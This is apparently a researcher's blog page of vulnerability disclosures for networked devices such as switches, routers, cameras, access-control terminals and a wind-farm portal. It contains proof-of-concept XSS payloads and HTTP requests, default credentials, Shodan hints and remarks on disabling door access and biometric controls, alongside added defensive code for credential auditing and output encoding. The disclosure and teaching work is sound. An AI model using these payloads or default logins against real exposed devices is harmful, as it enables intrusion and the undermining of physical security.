Posts Tagged ‘XSS’

Alcatel-Lucent OmniSwitch 6250 Switch sys_filesystem_info_si.html Multiple Parameter Stored XSS

March 1, 2016

The Alcatel-Lucent OmniSwitch 6250 Switch has a cross-site scripting (XSS) vulnerability in the /sys/content/sys_filesystem_info_si.html page (CVE-2016-78002). An authenticated user with permission to update the fields can inject arbitrary JavaScript into three fields that will be stored and displayed on /phys/content/phys_chs_info_stable.html when viewed. The fields/parameters are Contact (EmWeb_ns:mip:208.T1:O1 parameter), Name (EmWeb_ns:mip:209.T1:O2 parameter), Location (EmWeb_ns:mip:210.T1:O3 parameter) which are updated by a POST request.

The payload looks like:

EmWeb_ns%3Amip%3A208.T1%3AO1=Alcatel-Lucent+%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A209.T1%3AO2=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-name%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A210.T1%3AO3=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A211=Apply

KZ Broadband iSurf 1004 / 1008 Multiple Vulnerabilities

January 26, 2016

KZ Broadband Technologies, LTD. iSurf 1004 and 1008 Integrated Access Devices ship with a default admin account for the web interface, according to the manual.

[screenshot: isurf-defaults]

I confirmed this works on iSurf 1004 V2.10 B02D09 Pack 02, iSurf 1004 IAD V2.10 B02D09 Pack 03 and iSurf 1008+ V2.10 B02D09 Pack 23.

The router allows multiple accounts and offers different access levels, which makes cross-site scripting a concern. There is a very basic XSS bug (CVE-2016-78001):

GET /en/cgi/SysSetContact.cgi?sys_contact=DF"><scr1pt>alert('DF')</scr1pt> HTTP/1.1

The script will render on /en/sys_info.htm:

<td><textarea cols="60" rows="5" id="contact" class="select"></textarea>
<input type="hidden" name="sys_contact" value="DF"><scr1pt>alert('DF')</scr1pt>">

Screenshot PoC:

[screenshot: isurf-xss1]

Barix Streaming Client Multiple Vulnerabilities

September 10, 2015

The Barix Streaming Client is a product that "can deliver high quality branded audio in real time via the internet or a local network to an unlimited number of locations and gives the option for localized and targeted ad insertion too, all via live streaming."

It uses a web interface for device management. By default it requires no authentication, and it does not appear to allow you to set a user account, only a password. Version B3.14 was tested and found to have additional problems!

Unauthenticated access –

[screenshot: barix01]

You can manipulate streaming settings and change the audio the person hears –

[screenshot: barix02]

Under Configuration -> Advanced Settings, the ‘User Agent’ field is not sanitized. Inserting script code triggers a POST request to /setup.cgi and updates the ‘S517’ parameter allowing for cross site scripting (CVE-2015-78000) that renders on uifadvanced.html –

[screenshot: barix03]

[screenshot: barix04-xss]

It also renders on /ixstatus.html –

[screenshot: barix06-rendered]

The security settings that allow for a password –

[screenshot: barix05-default]

You can also manually reboot the device or create a script that will continually reboot it –

[screenshot: barix07-reboot-dos]

AXESS TMC X1 / X2 Multiple Vulnerabilities

December 30, 2013

AXESS TMC makes a set of terminals that manage Time & Attendance as well as Access Control. For example the X1 and X2 perform a lot of functions in a compact unit and still offer remote management capability (Shodan search and look for “X1/X2 Configuration”).

These devices have default administrator credentials for the web and FTP interface: admin / admin

As admin you can recover the other passwords because they are stored in plaintext: the web interface displays them on the various screens, and over FTP (or the HTTP file-browse menu) they are readable in the PARAMETERS.TXT file:

OperatorPassword=00000
RemotePassword=admin

[GPRS]
[..]
User=""
Password=""

[FtpClient]
ServerURL=
User=""
Password=""

[USB]
Enabled=1
PasswordUSB=00000
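To show what the PARAMETERS.TXT exposure gives an attacker in practice, here is an added example, not code from the original post or from AXESS: a small parser for the file layout quoted above that reports every credential-like key and says whether its value is empty, a known default, or simply a cleartext secret. The sample text is constructed from the excerpt above (the elided GPRS keys are left out), and the default list (admin, 00000) is an assumption drawn from the values reported on this page.

```python
# Added example (not from the original post or from AXESS): parse an AXESS-style
# PARAMETERS.TXT dump and flag credentials that are stored in cleartext, empty,
# or equal to a known default. Key names follow the file excerpt quoted above;
# the default list is an assumption based on the admin/admin and 00000 values
# the post reports.
import re

# Constructed sample reproducing the layout quoted in the post (top-level keys,
# then [Section] blocks). Not a capture from a live device.
SAMPLE_PARAMETERS = """\
OperatorPassword=00000
RemotePassword=admin

[GPRS]
User=""
Password=""

[FtpClient]
ServerURL=
User=""
Password=""

[USB]
Enabled=1
PasswordUSB=00000
"""

# Assumed defaults, taken from the values the post reports for this device.
KNOWN_DEFAULTS = {"admin", "00000"}
CRED_KEY = re.compile(r"(password|passwd|pwd|secret|pin)", re.I)


def parse_parameters(text):
    """Return {section: {key: value}} with the top-level keys stored under ''.

    Values wrapped in double quotes (User="") are unquoted; a blank value stays blank.
    """
    config = {"": {}}
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            config.setdefault(section, {})
            continue
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        config[section][key.strip()] = value
    return config


def find_weak_credentials(config):
    """Return [(section, key, reason)] for every credential-like key.

    Every match is worth reporting because the file stores the literal secret;
    empty, default and single-repeated-character values get a more specific reason.
    """
    findings = []
    for section, params in config.items():
        for key, value in params.items():
            if not CRED_KEY.search(key):
                continue
            if value == "":
                reason = "empty"
            elif value.lower() in KNOWN_DEFAULTS:
                reason = "default"
            elif len(set(value)) == 1:
                reason = "repeated-character"
            else:
                reason = "cleartext"
            findings.append((section, key, reason))
    return findings


if __name__ == "__main__":
    for section, key, reason in find_weak_credentials(parse_parameters(SAMPLE_PARAMETERS)):
        print(f"[{section or 'top-level'}] {key}: {reason}")
```

Run against a file pulled over FTP, the output is a checklist of every password that needs changing before the device goes on a network, which for the sample above is all five of them.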

There is an XSS vulnerability in /file_manager.cgi (CVE-2013-78000) via file upload as demonstrated here:

[screenshot: x1-xss1]

[screenshot: x1-xss2]

[screenshot: x1-xss3]

For red teamers access to this device could allow for remote disabling of physical security features. The /biometric.cgi page lets you manipulate the biometric sensors or disable them completely if they are already enabled. It isn’t as good as popping the door locks but sure makes it easier for physical access!

[screenshot: x1-biometrics]

The /access.cgi page can also let you manipulate access controls or disable them completely:

[screenshot: x1-accesscontrol]

Vilar IP Camera Multiple Vulnerabilities

December 22, 2013

The Vilar IP Camera model IP-001A is probably the Monacor VWC-300PT camera under different branding. Even the manual uses the VWC-300PT header but refers to it as the Vilar elsewhere! The Vilar IP-001A running firmware 1.1.0.32 has default administrative credentials:

After that click [ok] and then enter the administrator’s username as “admin” and the administrator password as “123456”.

There is also a stored cross-site scripting vulnerability in the /setup/user_account.html page. If you create a user (even with guest privileges) and use an XSS payload for the name, it will save it and render it on subsequent loads (after the camera reboots). The URL of this page is http://[target]/cgi-bin/action?action=loadpage&page=/setup/user_account.html&lang=eng, but once you submit the form the update is actually performed by the http://[target]/cgi-bin/action script. Example payload:

action=write&cfg_content=useraccount&lang=eng&Account_Name1=admin&Account_passwd1=**********&Account_access1=4&Account_Name2=user&Account_passwd2=**********&Account_access2=2&Account_Name3=roger&Account_passwd3=**********&Account_access3=2&Account_Name4=guest&Account_passwd4=**********&Account_access4=1&Account_Name5=df"><script>alert('DF')</script>&Account_passwd5=df&Account_access5=1&Account_access6=0&Account_access7=0&Account_access8=0&Account_allowVisit=0&submit=Apply

[screenshot: vilar-xss1]

IQ3 Trend LAN Controller – Multiple Reflected XSS

October 23, 2013

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I saw, I poked at one without authentication. By default you are given system guest access, which lets you see the status of components. Some of these pages allow for cross site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf"><alert>('DF')</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/K.htm?ovrideStart=df&ovrideStart=0
Proxy-Connection: Keep-Alive

[screenshot: iq3-xss1]

2. Z.htm ovrideStart Parameter Reflected XSS

In addition there are 10 sub-pages in the format Z#(W).htm, one for each of 10 zones. Each of these pages has a reflected XSS in the same parameter:

http://1.2.3.4/Z2(W).htm?ovrideTitle:d=Normal%20Week"><alert>('DF')</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS

Nordex NC2 Wind Farm Portal Reflected XSS

October 18, 2013

Another saved Shodan search, this one for Nordex NC2 Wind Farm Portal software. I copied some of the software (version 11.06.11) over, since it allows open directory browsing (go to /1_07_00/nc2/program_en/ for example), and checked for issues:

POST /login HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/11_06_11/index_en.jsp
Proxy-Connection: Keep-Alive
Content-Length: 129
Content-Type: application/x-www-form-urlencoded

connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&pw=nordex&language=en

[screenshot: nordex-xss1]

update: ICS-VU-308064
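The iSurf sys_contact bug earlier on this page lands the payload inside an HTML attribute value, while the Nordex userName reflection above lands it inside a JavaScript string literal, which is why the two payload shapes differ. The following is an added example, not code from the original post or from either vendor, that renders the same input the way the affected pages appear to (raw concatenation) and then with encoding matched to each context; the template strings and the showUser function name are assumptions modelled on the quoted HTML. The check generalises to the other stored-XSS entries on this page (Alcatel-Lucent, Barix, Vilar, Dreambox, Heatmiser): if rendering a payload produces more tags than rendering a harmless value, output encoding is missing for that sink.

```python
# Added example (not from the original post or from any vendor named on this page):
# the same user-controlled string rendered into an HTML attribute and into a
# JavaScript string literal, first as the affected pages do it, then encoded
# for the context. Templates and the showUser() name are assumptions.
import html
import json
import re

# Payloads as used on this page (straight quotes).
ATTR_PAYLOAD = "DF\"><scr1pt>alert('DF')</scr1pt>"
JS_PAYLOAD = "admin'\");}</script><script>alert('DF')</script>"


def render_hidden_input_vulnerable(value):
    # Raw concatenation: a double quote in `value` closes the attribute.
    return f'<input type="hidden" name="sys_contact" value="{value}">'


def render_hidden_input_fixed(value):
    # html.escape(quote=True) encodes & < > " ' so the value cannot leave the attribute.
    return f'<input type="hidden" name="sys_contact" value="{html.escape(value, quote=True)}">'


def render_login_script_vulnerable(user):
    # A string literal built by concatenation: ' closes it, </script> ends the block.
    return f"<script>showUser('{user}');</script>"


def render_login_script_fixed(user):
    # json.dumps yields a quoted, backslash-escaped JS string; < > & are then
    # written as \u00XX escapes so the HTML parser never sees a tag (in
    # particular no </script>) inside the literal.
    literal = json.dumps(user)
    literal = literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    return f"<script>showUser({literal});</script>"


# Anything that looks like the start of an opening or closing tag.
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.I)


def introduces_markup(render, payload, benign="df"):
    """True when rendering `payload` yields more tag starts than a benign value.

    The benign render establishes how many tags the template itself emits, so
    any surplus must have come from the payload, whatever the sink context.
    """
    return len(TAG_RE.findall(render(payload))) > len(TAG_RE.findall(render(benign)))


if __name__ == "__main__":
    for name, render, payload in [
        ("attribute, vulnerable", render_hidden_input_vulnerable, ATTR_PAYLOAD),
        ("attribute, fixed", render_hidden_input_fixed, ATTR_PAYLOAD),
        ("js string, vulnerable", render_login_script_vulnerable, JS_PAYLOAD),
        ("js string, fixed", render_login_script_fixed, JS_PAYLOAD),
    ]:
        print(f"{name}: breaks out = {introduces_markup(render, payload)}")
        print("   ", render(payload))
```

Note that HTML entity encoding alone would not have fixed the Nordex case: inside a script block the browser does not decode entities, so &lt; would reach the JavaScript engine literally, while an unencoded </script> would still end the block. Each sink needs the encoder for its own context.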

Dreambox Bouquet Editor – Multiple XSS

October 11, 2013

Dreambox Bouquet Editor is a third-party plugin for Enigma2 set top box software to more easily manage bouquets. (Shodan search)

#1 /bouqueteditor/web/getservices newName Parameter Stored XSS (CVE-2013-78005)

Visit http://10.0.1.1/bouqueteditor/ and rename a bouquet with a standard XSS string. The next time /bouqueteditor/web/getservices reloads the payload fires.

POST /bouqueteditor/web/renameservice?sRef=1:7:1:0:0:0:0:0:0:0:FROM%20BOUQUET%20%22userbouquet.___script_alert__df____script___tv_.tv%22%20ORDER%20BY%20bouquet&mode=0&newName=%22%3E%3Cscript%3Ealert('findme')%3C%2Fscript%3E HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

#2 /bouqueteditor/web/addbouquet name Parameter Stored XSS (CVE-2013-78005)

Add a new bouquet and use your regular XSS string. As soon as it is added the page will refresh and trigger the code:

[screenshot: dreambox-xss01]

POST /bouqueteditor/web/addbouquet?name=%22%3E%3Cscript%3Ealert('DF')%3C/script%3E&mode=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 10.0.1.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://10.0.1.1/bouqueteditor/
Cookie: %7B%22updateCurrentInterval%22%3A120000%7D; %7B%22updateCurrentInterval%22%3A120000%2C%22updateBouquetInterval%22%3A300000%7D
Proxy-Connection: Keep-Alive
Content-Length: 0
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache,no-store
Expires: -1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

[screenshot: dreambox-xss02]

Heatmiser NetMonitor – Multiple Vulnerabilities

October 9, 2013

“The Heatmiser Netmonitor is a self contained unit allowing you to control your heating system over the internet from any web browser. Simply plug the Netmonitor in to your router and take complete control.” (Shodan search)

Affected: NetMonitor 1.04, 1.1, 3.02, 3.03, 3.7 and 3.8 for the default credentials; 3.8 was tested for the rest.

#1 Default Admin Credentials

According to the manual the default is admin / admin.

[screenshot: heatmiser-login]

#2 Cleartext Admin Password Disclosure

GET /networkSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/left.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive

[screenshot: heatmiser-cleart]

#3 Multiple Stored XSS (CVE-2013-78006)

Using the standard ">alert('DF') XSS string, the following pages are vulnerable. They require admin authentication or can be exploited via cross-site request forgery (CSRF):

POST /statSetup.htm HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.49
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.49/statSetup.htm
Cookie: hmcookie=0
Proxy-Connection: Keep-Alive
Content-Length: 424
Content-Type: application/x-www-form-urlencoded

rdbkck=0&statname=Towel+Rails%23Utility+Room%23Kitchen%23Dining+Room%23Lounge%23Bed2+%26+En-suite%23Bed3%23">alert('DF')%23Upstairs+Rads%23Room+10%23Room+11%23Room+12%23Room+13%23Room+14%23Room+15%23Room+16%23Room+17%23Room+18%23Room+19%23Room+20%23Room+21%23Room+22%23Room+23%23Room+24%23Room+25%23Room+26%23Room+27%23Room+28%23Room+29%23Room+30%23Room+31%23Room+32&statmap=11111111100000000000000000000000

[screenshot: heatmiser-xss1]

These pages are also affected:
/sensorSetup.htm – POST Method – snstitle, snstemp and snsalmen parameters (likely 8 more but didn’t test)
/inputSetup.htm – POST Method – inputtitle parameter
/outputSetup.htm – POST Method – outputtitle parameter

The rest of the setup pages are probably vulnerable too, since nothing appeared to be sanitized, but I didn't have time to check.

Agilent E5810A LAN/GPIB Gateway – Multiple Vulnerabilities

October 7, 2013

The E5810A LAN/GPIB Gateway from Agilent has several vulnerabilities.

#1 Unauthenticated Telnet Access

According to the manual you can telnet to the device to configure it, a feature kept for backward compatibility:

For backward compatibility with the E2050 LAN/GPIB Gateway, the Telnet Utility functionality is provided with the E5810. However, E5810 Web Access is the preferred method to configure the E5810.

Testing this:

df ~$ telnet 1.2.3.4
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
Welcome to the E5810 LAN/GPIB Gateway Configuration Utility.
Controls GPIB and RS-232 interfaces via the LAN

Commands
? View Available Commands
exit, quit Exit WITHOUT Saving Configuration Changes (see reboot)
reboot Save Configuration Changes and Restart E5810
status View the LAN/GPIB Gateway Connection Status

Read-only E5810 Parameters
hardware-addr: 0030D30969B9 # Ethernet (MAC) Address
serial-num: MY43003219 # Serial Number

Configurable Parameters saved in E5810 non-volatile memory
(Note: Some E5810 current values "in-use" may be different)
dhcp: OFF # Configure LAN for DHCP boot
ip: 1.2.3.4 # Internet Protocol (IP) Address
subnet-mask: 255.255.255.0 # Network Subnet Mask
gateway: 1.2.3.1 # Network Gateway

dns-server: 4.3.2.1 # DNS Server
hostname: # Internet Hostname

description: Agilent E5810 (00-30-D3-09-69-B9) # Device Description (UPnP Friendly Name)
upnp: ON # Configured as UPnP device

lan-timeout: 7200 # LAN Timeout (Keepalive) in sec
io-timeout: 120 # I/O Timeout in seconds

gpib-name: gpib0 # GPIB SICL Interface Name
gpib-address: 21 # GPIB System Controller Address
gpib-unit: 7 # GPIB Logical Unit (LU) Number

rs232-name: COM1 # RS-232 SICL Interface Name
rs232-baud: 9600 # RS-232 Baud Rate
rs232-bits: 8 # RS-232 Bits
rs232-stopbits: 1 # RS-232 Stop Bits
rs232-parity: NONE # RS-232 Parity
rs232-flow: NONE # RS-232 Flow Control
rs232-srq: RI # RS-232 SRQ

> ?
Available commands are:
help View Help Information
? View Available Commands
config View Configured Settings
serial-num View the Device Serial Number
version View the Firmware Revision
hardware-addr View the Ethernet (MAC) Address
dhcp Turn OFF or ON the use of DHCP
ip View/Set the IP Address
subnet-mask View/Set the Network Subnet Mask
gateway View/Set the Gateway Address
dns-server View/Set the DNS Server Address
hostname View/Set the Internet Hostname
description View/Set Device Description (UPnP Friendly Name)
upnp Turn OFF or ON the use of UPnP
lan-timeout View/Set the LAN Timeout (Keepalive). 0 is Off.
io-timeout View/Set the Server I/O Timeout. 0 is Off.
gpib-name View/Set the GPIB SICL Interface Name
gpib-address View/Set the GPIB System Controller Address
gpib-unit View/Set the GPIB Logical Unit Number
rs232-name View/Set the RS-232 SICL Interface Name
rs232-baud View/Set Baud
rs232-bits View/Set number of RS-232 data Bits
rs232-stopbits View/Set number of RS-232 Stop Bits
rs232-parity View/Set the RS-232 Parity
rs232-flow View/Set the RS-232 Flow Control
rs232-srq View/Set the RS-232 SRQ Line
status View the LAN/GPIB Gateway Connection Status
syslog-display View Contents of the Syslog
syslog-clear Clear the Syslog
password Enter the Password (when prompted)
(Password is required when making changes)
changepassword Change the Password (when prompted)
reboot Save Configuration and Reboot E5810
factory-reset Reset Config to Factory Defaults and Reboot
exit Exit WITHOUT Saving Configuration (see reboot)
quit Exit WITHOUT Saving Configuration (see reboot)
bye Exit WITHOUT Saving Configuration (see reboot)

> quit

E5810 Non-UPnP parameters are UNCHANGED.
Telnet session will end.

Connection closed by foreign host.

#2 Default Password for Web Interface

From the manual:

The E5810 uses these default configuration values until you set any other configuration values.
Password E5810

#3 password.html Cleartext Password Disclosure

Regardless of what the password is, the password.html page sends the current one to the client. It only uses JavaScript to obscure it, so viewing the page source reveals it:

http://1.2.3.4/html/password.html

[screenshot: agilent01]

[screenshot: agilent02]

#4 config_lan.html hostName Parameter Stored XSS (CVE-2013-78007)

Go to the configuration page and change the hostname. Local JavaScript blocks special characters in the browser, but that is not enforced by the device: use a proxy and send a regular XSS string:

POST /html/config_lan.html HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/html/config_lan.html
Proxy-Connection: Keep-Alive
Content-Length: 451
Content-Type: application/x-www-form-urlencoded

Save=+Save+&dhcpSetting=0&ipAddress=1.2.3.4&subnetMask=255.255.255.0&subnetAddress=1.2.3.4&DNSserver=4.3.2.1&hostName=alert('df')&description=Agilent+E5810+%2800-30-D3-09-69-B9%29&UPnPSetting=1&lanTO=7200&ioTO=120&gpibName=gpib0&gpibAddr=21&gpibLU=7&rs232Name=COM1&BaudSetting=9600&ParitySetting=NONE&BitsSetting=8&StopBitsSetting=1&FlowSetting=NONE&SrqSetting=RI&passOld=&curPassOld=E5810&pass1=&pass2=&ContinueOn=True

[screenshot: aglient03-xss]
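The fix for #4 is to enforce the character rule on the device, since the browser-side JavaScript filter is only a convenience that any intercepting proxy removes. The following is an added example, not code from the original post or from Agilent, of a server-side hostName check using RFC 1123 host-name syntax (an assumption about what the field should accept) applied to a form body like the one above; the handler function is a stand-in for the device's form processing, not its actual code, and the request bodies are constructed from the post's request.

```python
# Added example (not from the original post or from Agilent): server-side
# validation of the hostName field that config_lan.html only checks in the
# browser. The RFC 1123 rule is an assumption about what the field should
# accept; handle_config_lan() is a stand-in for the device's form handler.
import re
from urllib.parse import parse_qs

# RFC 1123 label: letters, digits and hyphens, no leading or trailing hyphen, 1-63 chars.
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)


def is_valid_hostname(name):
    """Accept an empty name (the device ships with none, see the telnet output) or RFC 1123 syntax."""
    if name == "":
        return True
    if len(name) > 253:
        return False
    return all(LABEL_RE.match(label) for label in name.split("."))


def handle_config_lan(body):
    """Stand-in for the device's form handler.

    Returns (status, stored_hostname). 400 means the request is rejected and
    nothing is written, whatever the browser-side filter did or did not do.
    """
    fields = parse_qs(body, keep_blank_values=True)
    requested = fields.get("hostName", [""])[0]
    if not is_valid_hostname(requested):
        return 400, None
    return 200, requested


# Constructed bodies: the first mirrors the proxied request in the post (the
# field list is shortened), the second a legitimate save, the third the same
# field carrying a full script tag, URL-encoded as a proxy would send it.
XSS_BODY = "Save=+Save+&dhcpSetting=0&ipAddress=1.2.3.4&hostName=alert('df')&description=Agilent+E5810"
GOOD_BODY = "Save=+Save+&dhcpSetting=0&ipAddress=1.2.3.4&hostName=e5810-gw.lab&description=Agilent+E5810"
TAG_BODY = "Save=+Save+&hostName=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&description=Agilent+E5810"

if __name__ == "__main__":
    for body in (XSS_BODY, GOOD_BODY, TAG_BODY):
        print(handle_config_lan(body))
```

Validation here is the right control because a hostname has a narrow, well-defined alphabet; for free-text fields such as the Barix User Agent or the Vilar account name on this page, the fix is output encoding at each sink instead, since the input legitimately contains characters you cannot reject.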